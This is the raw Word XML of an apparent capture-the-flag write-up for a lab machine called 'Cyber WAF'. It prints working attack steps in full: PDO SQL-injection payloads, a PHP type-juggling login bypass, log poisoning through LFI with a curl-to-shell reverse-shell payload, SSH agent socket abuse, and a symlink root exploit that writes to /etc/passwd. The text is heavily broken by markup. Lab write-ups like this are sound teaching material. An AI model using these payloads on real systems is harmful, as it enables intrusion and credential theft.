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dpvaib8tv9s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e3alcaxdf4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CYBER WAF machine. If you require support,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7lcsks5s5slz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initial enumeration of the machine was performed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 order to identify open ports and services exposed by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-Pn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</w:t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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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the Nmap scan, it was identified that the IP address redirects to </w:t>
      </w:r>
      <w:hyperlink r:id="rId9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http://cyberwaf.hc/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To ensure proper name resolution, the domain was added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file, allowing local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nano /etc/hosts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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 configuration, it became possible to access the web application through</w:t>
      </w:r>
      <w:hyperlink r:id="rId11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http://cyberwaf.hc/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76600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Additionally, fuzzing was performed to identify subdomains associated with the application. Through fuzzing,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subdomain was discovered.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-u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//cyberwaf.hc/ -H "Host: FUZZ.cyberwaf.hc" -w n0kovo_subdomains.txt -c -t 100 -fw 20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37113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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1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newly identified subdomain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was added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on the local machine to allow proper DNS resolution. Next, the administrative subdomain was accessed (</w:t>
      </w:r>
      <w:hyperlink r:id="rId15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admin.cyberwaf.hc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46307"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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30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fuzzing of the application,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.git directory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discovered exposed, characterizing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 Exposed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directory contained the complete repository of the application, allowing access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source code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-u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//admin.cyberwaf.hc/FUZZ -w quickhits.txt -c -t 100 -fw 20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05871"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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87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exploit the exposed Git repository, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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git-dumper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tool was used, allowing the complete extraction of the repository to a local directory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python3 git_dumper.py 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//admin.cyberwaf.hc/.git app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48000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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1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analyzing the extracted repository files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 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command, it was possible to examine the commit history and identify a valid user associated with the project: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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aurora@cyberwaf.hc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 log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97100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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analysis of the application files, the route definition file was identified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app/routes/routes.php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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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file responsible for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home.php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located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controllers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directory. In this file, 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line 30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 authentication routine was identified that validates user credentials using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MD5 hash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 password verification.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code uses hash comparison through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== operator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may introduce risks related to weak or inconsistent comparisons depending on the implementation.</w:t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46613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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6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view.php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corresponding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/products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route, a function responsible for performing database queries through the function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getData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identified, located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models/modelsFunctions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Code analysis demonstrates that the parameter used to define the query column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user-controlled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characterizing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 vulnerability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0744"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4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7488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4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route, corresponding to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controllers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role-based access control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mechanism was identified requiring the value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 authorization. Additionally, the functionality uses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user-controlled parameter named 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dynamically construct a file path that is included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Even with the restriction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.log extension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this behavior characterizes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 File Inclusion (LFI)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vulnerability, allowing reading of application log files and potentially leading to additional impact if manipulable files are included.</w:t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92155"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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15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models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Models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contains a reference to the database name used by the application, identified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demo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05100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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a aplicação realiza a validação de senha por meio de comparação fraca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(==)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entre hashes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MD5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um cenário clássico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Type Juggling em PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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the application performs password validation using weak comparison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(==)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between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MD5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hashes, a classic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Type Juggling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scenario was identified.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PHP, values beginning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0e followed only by numbers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are interpreted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scientific notation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resulting in the numeric value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when implicit type conversion occurs. Thus, two different strings such as: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0e830400451993494058024219903391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0e462097431906509019562988736854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are evaluated as equal when compared with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==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since both are treated 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0.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password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QNKCDZO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when processed with MD5, generates a hash beginning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authentication bypass if the application uses non-strict comparison.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Even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this behavior still occurs when the application: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MD5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 password storage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Performs comparison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== instead of ===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Does not apply secure functions such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hash_equals().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Therefore, it was possible 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bypass the authentication mechanism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access the application using invalid credentials.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aurora@cyberwaf.hc:QNKCDZO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78100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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/products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 was accessed, where it was possible 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manipulate SQL query parameters,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allowing control over the table used in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query.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36900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Even when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PDO in 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is possible to manipulate user input to confuse the PDO parser, causing part of the content to be interpreted as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placeholder instead of literal text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specific cases, injecting a placeholder followed by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null byte (\0)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may cause incorrect query interpretation, allowing malicious payloads to be incorporated into the final statement.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behavior enables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 even with prepared statements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especially when SQL is dynamically constructed with non-parameterizable parts such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column or table names concatenated from user input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hyperlink r:id="rId31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https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/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(SELECT%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20table_name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20information_schema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.tables)y;%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&amp;verify=\?%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</w:t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 FROM (SELECT table_name AS `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x` from information_schema.tables)y;#&amp;verify=\?#�`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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75000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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SQL Injection exploitation, it was possible to enumerate all tables present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demo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database.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0x64656d6f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 demo #nome da banco de dados em hexadecimal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(SELECT%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20table_name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20information_schema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.tables%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20WHERE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20table_schema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0x64656d6f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)y;%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&amp;verify=\?%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tables</w:t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 FROM (SELECT table_name AS `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x` from information_schema.tables WHERE table_schema=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0x64656d6f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)y;#&amp;verify=\?#� # tables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46500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Two tables were identified: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waf_products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Next, the columns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table were extracted. Identified columns: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(SELECT%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20column_name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20information_schema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.columns%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20WHERE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20table_schema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0x64656d6f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20and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20table_name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0x7573657273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)y;%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&amp;verify=\?%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</w:t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 FROM (SELECT column_name AS `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x` from information_schema.columns WHERE table_schema=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0x64656d6f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 table_name=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0x7573657273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)y;#&amp;verify=\?#�</w:t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0x7573657273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 users # nome da tabela em hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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21100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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combined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CONCAT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was possible to extract additional information from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table, including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yanna@cyberwaf.hc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 hash of their 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24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(SELECT%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20CONCAT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(id,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,email,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,password,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,admin)`%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20users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)y;%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&amp;verify=\?%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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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?name=x` FROM (SELECT CONCAT(id,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,email,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,password,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,admin)`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x` from users)y;#&amp;verify=\?#�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yanna@cyberwaf.hc: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1861d297772b6e5e36339b54ebd5a65d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95700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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hash was then cracked using </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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CrackStation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recovering the plaintext password:</w:t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yanna@cyberwaf.hc:sheena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46300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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plaintext password, it was possible to authenticate into the application with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privileged user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97200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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privileged access,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 became accessible. Source code analysis confirmed the presence of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 File Inclusion (LFI)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40100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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source code, the functionality restricts inclusion to files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.log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extension, limiting exploitation to application logs.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it is still possible to attempt to access relevant system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/var/log/apache2/access.log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/var/log/auth.log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Despite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.log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extension restriction, it was not possible to read system logs, such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/var/log/apache2/access.log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logs, due to the limited scope of the log directory accessible by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application uses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ModSecurity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OWASP CRS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 logs are accessible for reading, there is a possibility of performing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poisoning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(injection of malicious content into the logs).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technique can be exploited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It's possible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attacker-controlled entries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logs (for example, via manipulated HTTP requests);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240" w:lineRule="auto"/>
        <w:ind w:left="72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it's possible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or include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these logs through a vulnerability like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LFI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scenario, the attacker can insert payloads into the logs and then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the log file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LFI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execute code or obtain sensitive information, depending on the context and the content interpretation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accessing the main page and attempting to send malicious content (e.g., SQL Injection or payloads in routes), the request was blocked by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WAF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indicating that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ModSecurity with OWASP CRS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active and filtering exploitation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49600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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WAF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blocking the exploitation attempts, the events are recorded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ModSecurity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audit file.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modsec\_audit.log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 is accessible for reading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LFI,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is possible to carry out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poisoning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attack, injecting malicious payloads into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then including the file to achieve remote code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../../../../../var/log/apache2/modsec_audit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08200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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read access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WAF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logs, we performed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Poisoning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injecting malicious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 code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into the records.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payload contained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 executing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command that sent a request to our server, thus validating remote command execution on the target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-s -A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"&lt;?php system('curl &lt;MACHINE-IP&gt;/'); ?&gt;" "http://cyberwaf.hc/?id=1'+OR+'1'='1"</w:t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-s -b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"PHPSESSID=&lt;YOUR-TOKEN&gt;" 'http://admin.cyberwaf.hc/admin?log=../../../../../var/log/apache2/modsec_audit'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46300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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request originating from the injected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was successfully received on our server on port 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python3 -m http.server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58900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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this point, it is also possible to get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curl to download our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shell.sh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 on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shell.sh              </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9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BA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/bin/bash -c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 -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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-s -A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"&lt;?php system('curl&lt;VPN-IP&gt;/shell.sh | sh'); ?&gt;" "http://cyberwaf.hc/?id=1'+OR+'1'='1"</w:t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-s -b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"PHPSESSID=&lt;YOUR-TOKEN&gt;" 'http://admin.cyberwaf.hc/admin?log=../../../../../var/log/apache2/modsec_audit'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43100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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request 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observed and the reverse connection was received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granting access to the application system.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60600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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initial access was obtained as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www-data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12900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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n6jkugougl4m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—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obtained an interactive TTY shell with the www-data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 /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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crt+z</w:t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stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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49400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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file, we identified two standard system users,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and ubuntu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addition to an extra user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aurora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 /etc/passwd | grep bash</w:t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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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directory, a directory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ssh-Ky3bL9xQp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found containing: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agent.4721 e aurora.sock.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11400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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command, it was identified that the file corresponds to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socket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agent.4721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24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 /tmp/ssh-Ky3bL9xQp/agent.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4721</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:spacing w:after="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57200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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identified file was exported for analysis.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testing the socket, the output confirmed that it is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 agent socket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containing a loaded key, as evidenced by the listing of identities associated with the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SSH_AUTH_SOCK=/tmp/ssh-Ky3bL9xQp/agent.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4721</w:t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ssh-add -l</w:t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33400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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exposed SSH agent socket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was possible to establish a connection with the machine using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aurora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ssh -o StrictHostKeyChecking=no aurora@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67100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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/home/aurora.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22300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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ot59stpx212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wcqbjkf66zu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—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 can enumerate the privileges of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aurora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check if they have permission to execute commands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without a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12800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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aurora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permission to execute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/usr/bin/below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without needing a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a known exploit for this binary that allows</w:t>
      </w:r>
      <w:hyperlink r:id="rId55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56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vertical privilege escalation</w:t>
        </w:r>
      </w:hyperlink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exploit is a Proof of Concept (PoC) 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CVE-2025-27591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vulnerability that allows unprivileged local users to perform privilege escalation to root through symlink attacks (symbolic link).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 -f /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA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ln -s /etc/passwd /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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 /etc/passwd /tmp/payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC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'pwned::0:0::/root:/bin/bash'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 /tmp/payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD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timeout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/usr/bin/below record &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:spacing w:after="0" w:before="24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sleep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FF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 /tmp/payload &gt; /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:spacing w:after="0" w:before="24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 - pwned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obtained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access on the system, concluding the privilege escalation.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943100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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root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flag is located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directory of the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44500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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headerReference r:id="rId59" w:type="default"/>
      <w:headerReference r:id="rId60" w:type="first"/>
      <w:headerReference r:id="rId61" w:type="even"/>
      <w:footerReference r:id="rId62" w:type="default"/>
      <w:footerReference r:id="rId63" w:type="first"/>
      <w:footerReference r:id="rId6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7">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1ls2ua3fzch8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28" name="image26.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image26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8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18" name="image24.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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9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Cyber Waf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96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29.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.pn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yberwaf.hc/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:aurora@cyberwaf.hc" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberwaf.hc/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/incommatose/CVE-2025-27591-PoC" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberwaf.hc/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/incommatose/CVE-2025-27591-PoC" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://admin.cyberwaf.hc" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dump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6.jp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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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lqvveXVjhkLKBW+IDxMUsNTA+g==">CgMxLjAyDmguZHB2YWliOHR2OXN5Mg5oLmxlM2FsY2F4ZGY0bzIOaC43bGNza3M1czVzbHoyDmgubjZqa3Vnb3VnbDRtMg5oLm90NTlzdHB4MjEyejINaC53Y3FiamtmNjZ6dTIOaC4xbHMydWEzZnpjaDg4AHIhMU9jMXV1X05hMFd0SmQzZm5TUi1kdnhpeGZ2cHlnaldB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